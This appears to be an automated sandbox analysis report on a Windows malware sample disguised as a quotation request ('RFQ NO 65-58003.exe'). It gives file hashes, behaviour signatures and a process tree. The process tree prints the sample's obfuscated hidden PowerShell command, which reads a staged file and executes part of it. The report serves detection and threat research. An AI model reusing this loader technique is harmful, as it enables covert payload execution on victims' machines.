Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
18-12-2024 10:03
Static task
static1
Behavioral task
behavioral1
Sample
RFQ NO 65-58003.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
RFQ NO 65-58003.exe
Resource
win10v2004-20241007-en
General
-
Target
RFQ NO 65-58003.exe
-
Size
819KB
-
MD5
e4e7b853e87922ff59bcae3527b206f9
-
SHA1
15e8dc7771a5b9ebeae4b64ccc20a8d9798158c2
-
SHA256
b4b7eab942bf5ffa93bef1444c82b059d3c18234bcec49df9ec2294bf0ec66bd
-
SHA512
92406ea4aa0b16b825a776756fd875cc1d224144666c56fe6a7fb3ca6d8f0090adeb3e6e1a07bddd83ef1e2b9dda382fa50738ccb78a3f3f73245a330da8be4c
-
SSDEEP
12288:3zpSYVj1vkBEu7i6rcdUYH+pIpHjGERkr1w0ZS8atGZnnBIjLNA8xrduQg9eC:9SYkWuO6dcQIpDJ2ZVnaFP5qEC
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2752 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RFQ NO 65-58003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2752 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2752 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2644 wrote to memory of 2752 2644 RFQ NO 65-58003.exe 30 PID 2644 wrote to memory of 2752 2644 RFQ NO 65-58003.exe 30 PID 2644 wrote to memory of 2752 2644 RFQ NO 65-58003.exe 30 PID 2644 wrote to memory of 2752 2644 RFQ NO 65-58003.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\RFQ NO 65-58003.exe"C:\Users\Admin\AppData\Local\Temp\RFQ NO 65-58003.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2644 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\Admin\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gastriskes=$Sonnetish.SubString(65822,3);.$Gastriskes($Sonnetish)2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
-